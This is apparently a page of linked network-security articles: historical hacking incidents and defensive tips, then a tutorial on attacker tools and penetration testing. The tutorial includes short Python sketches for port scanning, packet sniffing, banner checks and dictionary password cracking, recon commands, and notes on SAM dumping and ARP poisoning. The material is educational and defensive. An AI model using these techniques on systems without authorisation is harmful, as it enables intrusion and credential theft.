  • Online Shopping may relate to the purchase of work-appropriate items as well as personal ones. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit access to certain hours of the day or block these sites altogether.
  • Non-Productive Surfing can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.

According to a survey involving over 3,000 employees, Salary.com found over 60% visiting sites unrelated to their work every day. More than 20% spent over five hours a week on non-work-related sites. Nearly half of those surveyed looked for a new job using office computers during their working hours.

In the next part of our article, we will examine the importance of putting in place a company security policy to help stop users visiting sites they shouldn't, wasting valuable time and resources, and engaging in activities that can compromise the enterprise's network security. We also take an in-depth look at how to effectively monitor and control traffic activity on the Web in real time, plus much more.

 


The Most Dangerous Websites On The Internet & How To Effectively Protect Your Enterprise From Them

Companies and users around the world are struggling to keep their network environments safe from malicious attacks and hijacking attempts by leveraging services provided by high-end firewalls, Intrusion Detection Systems (IDS), antivirus software and other means. While these appliances can mitigate attacks and hacking attempts, we often see the whole security infrastructure failing because of attacks initiated from the inside, effectively bypassing all protection offered by these systems.

I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example: when users find a link while browsing the Internet, they tend to click on it to see where it goes, even if the context suggests that the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.

The implications of following links with malicious content vary for each company; however, here are a few common cases we often see or read about:

  • Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)
  • The company’s servers are overloaded by thousands of requests made from the infected workstation(s)
  • Sensitive information is pulled from the workstations and sent to the hackers
  • Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions
  • Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop
  • Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays

As you can see there are countless examples we can analyze to help us understand how serious the problem can become.

Download this whitepaper if you are interested to:

  • Learn which are the Top 10 Dangerous sites users visit
  • Learn the Pros and Cons of each website category
  • Understand why web content filtering is important
  • Learn how to effectively block sites from compromising your network
  • Learn how to limit the amount of the time users can access websites
  • Effectively protect your network from end-user ‘mistakes’
  • Ensure user web-browsing does not abuse your Internet line or Email servers

We apologise; however, the whitepaper is no longer available from the vendor. Head to our homepage to read up on new network and security related articles.

 



Download Your Free Whitepaper: How to Secure your Network from Cyber Attacks

Cybercriminals are now focusing their attention on small and mid-sized businesses because they are typically easier targets than large, multinational corporations.
This white paper examines the rising security threats that put small and medium businesses at risk. It also highlights important security considerations that SMBs should be aware of.

Download this whitepaper if you’re interested to:

  • Learn how to adopt best practices and boost your business security.
  • Evaluate the SMB digital footprint.
  • Know what to look for in new security solutions.

We apologise; however, the whitepaper is no longer available from the vendor. Head to our homepage to read up on new network and security related articles.


A Networked World: New IT Security Challenges

This is the age of networks. Long ago, they said, ‘the mainframe is the computer’. Then it changed to ‘the PC is the computer’. That was followed by ‘the network is the computer’. Our world has been shrunk, enlightened and speeded up by this globe-encapsulating mesh of interconnectivity. Isolation is a thing of the past. Now my phone brings up my entire music collection residing on my home computer. My car navigates around the city, avoiding traffic in real time. We have started living in intelligent homes where we can control objects within them remotely.

On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?

Tower, Am I Cleared For Landing?

March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground to air communications system went down. This meant that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport. All incoming flights had to be diverted to another airport to avoid a disaster.

This mayhem was caused by a 17-year-old hacker named Jester. He had used a normal telephone line and physically tapped into it, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn ended up being part of a high-end fibre backbone. He was caught when, directed by the United States Secret Service, the telephone company traced the data streams back to the hacker’s parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.

As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.

Intruder Alert

April 1994: A US Air Force base realised that their high-level security network had not just been hacked: secure documents had been stolen. This resulted in an internal cyber man-hunt. The bait was laid and all further intrusions were monitored. A team of 50 Federal Agents finally tracked down two hackers who had been using US-based social networking systems to hack into the Air Force base. But it was later revealed that the scope of the intrusion was not just limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases of ‘datastreamcowboy’ and ‘kuji’.

‘Datastreamcowboy’ was a 16-year-old British national who was apprehended on May 4th 1994, and ‘kuji’ was a 21-year-old technician named Mathew Bevan from Cardiff, Wales. ‘Datastreamcowboy’ was like an apprentice to ‘kuji’: he would try a method of intrusion and, if he failed, he would go back to ‘kuji’ for guidance. ‘kuji’ would mentor him to a point where, on subsequent attempts, ‘datastreamcowboy’ would succeed.

What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.

But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.

Social Virus

October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcast the hacker’s messages. The modus operandi of the hacker was to place a virus on his own profile. Whenever someone visited his profile page, he/she would be infected and their profile would show the hacker’s profile message. These newly infected users would then spread the infection to their friends on MySpace, creating a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.

The creator of this mayhem was Samy Kamkar, a 19-year-old. But his attack was not very well organised: he left digital footprints and was later caught. Banned from using a computer for 3 years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.

What that showed the world was the fact that a cyber attack could come from anywhere, anytime.

In our current digital world we already know that a lot of our complex systems like Air Traffic Control, power stations, dams, etc are controlled and monitored using computers and networks. Let’s try to understand the technology behind it to gauge where the security vulnerabilities come from.

SCADA: Observer & Controller

Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?

SCADA is an acronym for Supervisory Control And Data Acquisition. A quick search on the internet and you would find the definition to be as follows:

SCADA (supervisory control and data acquisition) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:

  • Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.
  • Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.
  • Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.

This effectively lets us control the landing lights on a runway, the gates of a reservoir or dam, or the connection and disconnection of power grids to a city supply.

Over the last decade all such systems have become connected to the internet. However, when SCADA was being developed no thought was given to security. No one imagined that a SCADA based system would end up on the internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.

Tests have been performed extensively to map the vulnerabilities of networked SCADA systems. One test was done on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased on the open market for as little as $2,500.

But, thankfully, more and more thought is given today when designing a SCADA based system which will be used over a network. Strict security policies and intrusion detection and avoidance technologies are implemented.

Where’s My Money?

The years 1994 – 1995 saw a momentous change in our financial industry: the entire financial sector went online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyberspace which we use for social networking, shopping and so on. As this involved money being transferred in unimaginable amounts, the financial industry, and especially banks, went to great lengths to protect themselves.

As happens in our physical world, where thieves adapt with the advent of better locks, hackers have changed their ways as well. They have developed tools that can bypass encryption to steal funds, or even hold an entire institution to ransom. The average annual loss due to cyber heists has been estimated at nearly 1.3 million dollars; since banks hardly hold any cash in their branches, an ordinary bank robbery would hardly amount to $6,000 – $8,000 in hard cash.

Cyber heists are a criminal industry with staggering rewards; the magnitude is in the hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of their long-term impact on the compromised institution’s reputation and credibility.

Your Card Is Now My Card!

2005: Miami, Florida. A Miami hacker made history in cyber theft. Alberto Gonzales would drive around Miami streets looking for unsecured wireless networks. He hooked onto the unsecured wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details. By the end of the second year he had stolen about 90 million card details.

He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.

In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.

Meltdown By Swatting

January 2005: A hacker with the alias ‘dshocker’ was carrying out an all-out attack on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers. This enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service attack on the corporation itself. The entire network went into a meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. These false alarms and the follow-up raids end up costing the civic authorities vast sums of money and resources.

He was finally arrested when his fraudulent credit card activities caught up with him.

Playing Safe In Today’s World

Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.

We can’t abandon the network, the cloud or the other things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and that the amenities we use every day are not turned against us. This goes for everyone, from big organisations to the individual using his home network.

At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged. That is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s email, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.

The simple exercise of keeping your pop-up blocker turned on will make surfing through your browser a lot safer. Your operating system, whether Windows or Linux, lets you keep a guest account, so whenever a ‘guest’ wants to check his/her emails or surf the web, have them use this account instead of your own. Not that you don’t trust your guest, but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has minimal privileges, so it is safer. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank. That’s safer.

At work, please don’t plug an unauthorised wireless access point into your corporate network; this can severely compromise it. Use strong passwords for accounts and remove old accounts that are no longer used. Incorporate strong firewall rules and demarcate an effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy, or to disable it: you are using company time for a purpose that can’t be work related. If access is genuinely needed, ask the network administrator for assistance.

I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.

Readers can also visit our Network Security section, which offers a number of interesting articles covering network security.

About the Writer

Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK, and works as a network designer and innovator for remote management systems for a major telecoms company in the UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.

 


Introduction To Network Security - Part 2

This article builds upon our first article Introduction to Network Security - Part 1. This article is split into 5 pages and covers a variety of topics including:

  • Tools an Attacker Uses
  • General Network Tools
  • Exploits
  • Port Scanners
  • Network Sniffers
  • Vulnerability Scanners
  • Password Crackers
  • What is Penetration Testing
  • More Tools
  • Common Exploits
  • A Brief Walk-through of an Attack
  • and more.

Tools An Attacker Uses

Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.

Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example I can use a network sniffer to diagnose a low level network problem or I can use it to collect your password. It just depends which shade of hat I choose to wear.

General Network Tools

As surprising as it might sound, some of the most powerful tools, especially in the beginning stages of an attack, are the regular network tools available with most operating systems. For example, an attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high profile targets such as webservers, mailservers, DNS servers etc. He might also be able to figure out what different systems do based on their DNS name -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.
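
As a rough illustration of this first information-gathering step, here is a short Python sketch (standard library only; the domain and hostnames are hypothetical) that resolves a few likely high-profile hostnames, much as an attacker would after a whois lookup:

# Basic footprinting sketch using only Python's standard library.
# Resolving a handful of obvious hostnames reveals the same kind of
# information 'nslookup' gives an attacker.
import socket

domain = "victim.com"                      # hypothetical target domain
for name in ("www", "mail", "ns1", "vpn", "sqlserver"):
    fqdn = f"{name}.{domain}"
    try:
        print(f"{fqdn:<25} {socket.gethostbyname(fqdn)}")
    except socket.gaierror:
        print(f"{fqdn:<25} no record")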

Exploits

An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (eg: a buffer overflow) or it could be a program that takes advantage of a misconfiguration.

A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones that the vendor has not yet released a patch for. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.

Port Scanners

Most of you will know what portscanners are. Any system that offers TCP or UDP services will have an open port for that service. For example if you're serving up webpages, you'll likely have TCP port 80 open, FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.

A portscanner scans a host or a range of hosts to determine what ports are open and what service is running on them. This tells the attacker which systems can be attacked.
For example, if I scan a webserver and find that port 80 is running an old webserver -- IIS/4.0, I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.

This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered and what operating systems are in use. One of the best portscanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system, is very versatile in how it lets you scan a system, and has many features including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is SuperScan (https://www.foundstone.com), which is only for the Windows platform.
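
To make the idea concrete, here is a minimal Python sketch of the simplest scan type, a TCP connect scan, against a placeholder address; real scanners like Nmap add SYN scanning, timing control and service detection on top of this. Only ever scan hosts you are authorised to test:

# Minimal TCP connect() port scanner - the simplest (and noisiest) scan type.
import socket

target = "192.0.2.10"                      # placeholder address (TEST-NET-1)
for port in (21, 22, 23, 25, 53, 80, 110, 161, 443):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)
    # connect_ex() returns 0 when the three-way handshake completes, i.e. the port is open
    if s.connect_ex((target, port)) == 0:
        print(f"{port}/tcp open")
    s.close()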

Network Sniffers

A network sniffer puts the computer's NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is TCPdump, as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.

When the target network is a switched environment (a network which uses layer 2 switches), a conventional network sniffer will not be of any use. For such cases, the switched-network sniffers Ettercap (http://ettercap.sourceforge.net) and Wireshark (https://www.wireshark.org) are very popular. Such programs are usually run alongside other hacking-capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure webpages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).
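
The following minimal Python sketch shows the basic capture idea using the third-party Scapy library (an assumption on my part -- any capture library would do). It needs root/administrator rights, and it simply prints a summary of telnet traffic, a protocol that still carries logins and passwords in clear text:

# Packet capture sketch using Scapy (pip install scapy).
# Putting the interface into promiscuous mode requires elevated privileges.
from scapy.all import sniff

def show(packet):
    # One-line summary of each captured frame (source, destination, protocol)
    print(packet.summary())

# Capture 20 packets matching a BPF filter - here, anything on TCP port 23 (telnet)
sniff(filter="tcp port 23", prn=show, count=20)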

Vulnerability Scanners

A vulnerability scanner is like a portscanner on steroids: once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes are found. The software can be updated to scan for the latest security holes. Unfortunately, these tools are very simple to use, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well, as they can scan their whole network and get a detailed summary of what holes exist.
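
The toy Python sketch below illustrates the principle on a single service: it grabs an HTTP Server banner and compares it against a tiny, made-up list of outdated versions. Real products such as Nessus or Retina do the same thing against thousands of constantly updated signatures; the host address and signature list here are placeholders:

# Toy version check in the spirit of a vulnerability scanner.
import socket

OUTDATED = ("IIS/4.0", "IIS/5.0", "Apache/1.3")     # illustrative signatures only

def http_server_banner(host, port=80):
    # Send a bare HEAD request and pull the Server: header out of the reply
    s = socket.create_connection((host, port), timeout=3)
    s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
    reply = s.recv(1024).decode("ascii", "replace")
    s.close()
    for line in reply.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return "unknown"

banner = http_server_banner("192.0.2.10")           # placeholder host you are authorised to test
verdict = "POSSIBLY VULNERABLE" if any(sig in banner for sig in OUTDATED) else "no match"
print(f"Server banner: {banner} -> {verdict}")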

Password Crackers

Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX-like systems this is the /etc/passwd or /etc/shadow file, and in Windows it is the SAM database. Once he gets hold of this file, it's usually game over: he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night !

There are essentially two methods of password cracking:

Dictionary Mode - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek Gods (yes Chris, that's a shout-out to you ;)) I can find a dictionary list of Greek God names and run it through the password cracker.

Most attackers have a large collection of wordlists. For example when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customized lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding on a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.

Brute Force Mode - In this mode, the password cracker will try every possible combination for the password. In other words it will try aaaaa, aaaab, aaaac, aaaad and so on. This method will crack every possible password -- it's just a matter of how long it takes. It can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include L0phtcrack for Windows passwords and John the Ripper for UNIX-style passwords.
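
As a small illustration of dictionary mode (including the 'word plus a couple of digits' trick mentioned above), the Python sketch below cracks an unsalted SHA-256 hash. The hash, wordlist and password are all made up for the example; real Windows SAM or UNIX crypt hashes use different formats, but the principle is identical:

# Dictionary-mode cracking sketch against an unsalted SHA-256 hash.
import hashlib

target_hash = hashlib.sha256(b"superman99").hexdigest()    # stands in for a stolen password hash
wordlist = ["password", "abc123", "letmein", "superman"]   # tiny illustrative wordlist

def dictionary_crack(target, words):
    for word in words:
        # try the bare word plus the common trick of appending 0-99
        for candidate in [word] + [f"{word}{n}" for n in range(100)]:
            if hashlib.sha256(candidate.encode()).hexdigest() == target:
                return candidate
    return None

print("Cracked password:", dictionary_crack(target_hash, wordlist))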

For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.


What is Penetration-Testing?

Penetration testing is basically when you hire (or perform yourself) security consultants to attack your network the way an attacker would do it, and report the results to you enumerating what holes were found, and how to fix them. It's basically breaking into your own network to see how others would do it.

While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).

An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.

I find there's a lack of worthwhile information online about penetration testing -- nobody really goes about describing a good pen test, and what you should and shouldn't do. So I've hand picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen-test.

This is by no means the only way to do things, it's like subnetting -- everyone has their own method -- this is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets as well as what level of testing you're allowed to do, this method can be adapted.

Papers Covering Penetration Testing

I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:

'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.

'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)

'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)

'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room

Pen-test Setup

I don't like working from laptops unless it's absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com); most Linux exploits compile fine under Cygwin, and if they don't then I shove them into VMware, where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesn't work, the system also dual-boots Red Hat 9, and often I'll just work everything out from there.

I feel the advantage of using a Microsoft platform often comes from the fact that 90% of your targets may be Microsoft systems. However, the flexibility under Linux is incomparable; it is truly the OS of choice for any serious hacker.. and as a result, for any serious security professional. There is no best OS for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.

If I don't have the option of using my own machine, I like to choose any Linux variant.
I keep my pen-tests strictly to the network level; there is no social engineering involved or any real physical access testing other than basic server-room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).

I try as far as possible to determine the Rules Of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important because if you do something that ends up causing trouble on the network, it's going to make you look very unprofessional. It's always better to have it set down clearly in writing -- this is what you are allowed to do.

I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if it's against your corporate policy. If you're an outside tester, offer to allow one of their people to be present for your testing if they want. This is recommended as they will ultimately be fixing most of these problems and, being in-house people, they will be able to put the results of the test in perspective for the managers.

Tools

I start by visiting the target website, running a whois, a DNS zone transfer (if possible) and other regular techniques which are used to gather as much network and generic information about the target as possible. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a textfile. Keeping notes is critically important; it's very easy to forget some minor detail that you should include in your end report.

Now for a part of the arsenal -- not in any order and far from the complete list.

Nmap - My (and everyone else's) workhorse port scanner, with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. When used smartly, Nmap can find any Internet-facing host on a network.

Nessus - My favourite free vulnerability scanner, it usually finds something on every host. It's not too stealthy though and will show up in logs (this is something I don't have to worry about too much).

Retina - A very good commercial vulnerability scanner. I stopped using this after I started with Nessus, but it's very quick and good. Plus, its vulnerability database is very up-to-date.

Nikto - This is a webserver vulnerability scanner. I use my own hacked up version of this perl program which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.

Cisco Scanner - This is a small Windows utility I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past and just goes to show how even small tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.

Sophie Script - A little perl script coupled with user2sid and sid2user (two windows programs) which can find all the usernames on a windows machine.

Legion - This is a Windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and allows you to map the drive right from within the software.

Pwdump2 - Dumps the contents of the Windows SAM password file for loading into a password cracker.

L0phtcrack 3.0 - Cracks the passwords I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via remote registry. I have not tried the latest version of the software, but it is very highly rated.

Netcat - This is a TCP/UDP connection backend tool, oh boy I am lost without this ! Half my scripts rely on it. There is also an encrypted version called cryptcat which might be useful if you are walking around an IDS. Netcat can do anything with a TCP or UDP connection and it serves as my replacement to telnet as well.

Hping2 - A custom packet creation utility, great for testing firewall rules among other things.

SuperScan - This is a Windows-based port scanner with a lot of nice options. It's fast, and has a lot of other neat little tools like NetBIOS enumeration and common utilities such as whois, zone transfers etc.

Ettercap - When sniffing a switched network, a conventional network sniffer will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send packets to you and you can sniff them. It also allows you to inject data into connections and kill connections among other things.

Brutus - This is a fairly generic protocol brute-forcing tool. It can bruteforce HTTP, FTP, Telnet and many other login authentication systems. This is a Windows tool; on Linux I prefer Hydra.

A Bunch of Common Exploits, Efficiently Sorted

This is my collection of exploits in source and binary form. I sort them in subdirectories by operating system, then depending on how they attack - Remote / Local and then according to what they attack - BIND / SMTP / HTTP / FTP / SSH etc etc. The binary filenames are arbitrary but the source filenames instantly tell me the name of the exploit and the version of the software vulnerable.

This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits; there is nobody I know who would authorise you to take down a production system. Don't do it -- and tell them you aren't doing it.. and only if they plead with you should you do it.

Presenting Reports

This is the critical part -- it's about presenting what you found to people who probably don't understand a word of what your job is about other than you're costing them money. You have to show them that there are some security problems in your network, and this is how serious they might be.

A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to do this, I believe it is important you exploit the system to at least level 1. This is important because there is a very big difference in saying something is vulnerable and actually seeing that the vulnerability is executable. Not to mention when dealing with a corporate type, seeing 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.

After you're done, make a VERY detailed chronological report of everything you did, including which tools you used, what version they are, and anything else you did without using tools (eg. SQL injection). Give gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try and include figures and statistics for whatever you can.

To cater to the admins, provide a report for each host you tested and make sure that for every security hole you point out, you provide a link to a site with a patch or fix. Try to provide a link to a site with detailed information about the hole, preferably Bugtraq or some other well-known source -- many admins are very interested in these things and appreciate it.


A Brief Walk-through of an Attack

This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number of attackers will follow a similar methodology, or at least a similar chain of events.

This section assumes that the attacker is moderately skilled and moderately motivated to break into your network. He/she has targeted you due to a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-link India are you listening ? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.

Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.

Reconnaissance & Footprinting

Here the attacker will try to gather as much information about your company and network as they can without making any noise. They will first use legitimate channels, such as Google and your company webpage, to find out as much about you as they can. They will look for the following information:


Technical information is a goldmine: something like a webpage that helps your employees log in from home is priceless information to them. So are newsgroup postings by your IT department asking how to set up particular software -- the attacker now knows you use that software and may know of a vulnerability in it.

Personal information about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.

Information about your partners. This might be useful to them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way into your network from there.

General news. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.

They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network level scans.
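
Much of this footprinting can be done with a couple of standard commands; a rough sketch, using placeholder names and addresses:

whois example.com        # registrant, technical contacts, name servers
whois 203.0.113.0        # who owns the surrounding address block
dig example.com any      # published DNS records for the domain
dig -x 203.0.113.10      # reverse lookup of an address found above

None of this touches your systems directly, which is exactly why it is so hard to detect.
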
After this they will start a series of network probes, the most basic of which will be to determine whether you have a firewall and what it protects. They will try to identify any systems you have that are accessible from the Internet.

The most important targets will be the ones that provide public services. These will be:

Web servers - usually the front door into the network. All web server software has some bugs in it, and if you're running home-made CGI scripts such as login pages, they might be vulnerable to techniques such as SQL injection.

Mail servers - Sendmail is very popular and most versions have at least one serious vulnerability in them. Many IT heads don't like to take down the mail server for maintenance as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail).

DNS servers - Many implementations of BIND are vulnerable to serious attacks. The DNS server can be used as a base for other attacks, such as redirecting users to other websites etc.

Network infrastructure - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled, they can be used for anything from a simple denial of service attack (by messing up their configurations) to channeling all your data through the attacker's machine to a sniffer.

Database servers - Many database servers have the default 'sa' account with a blank password, among other common misconfigurations. These are very high-profile targets, as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.

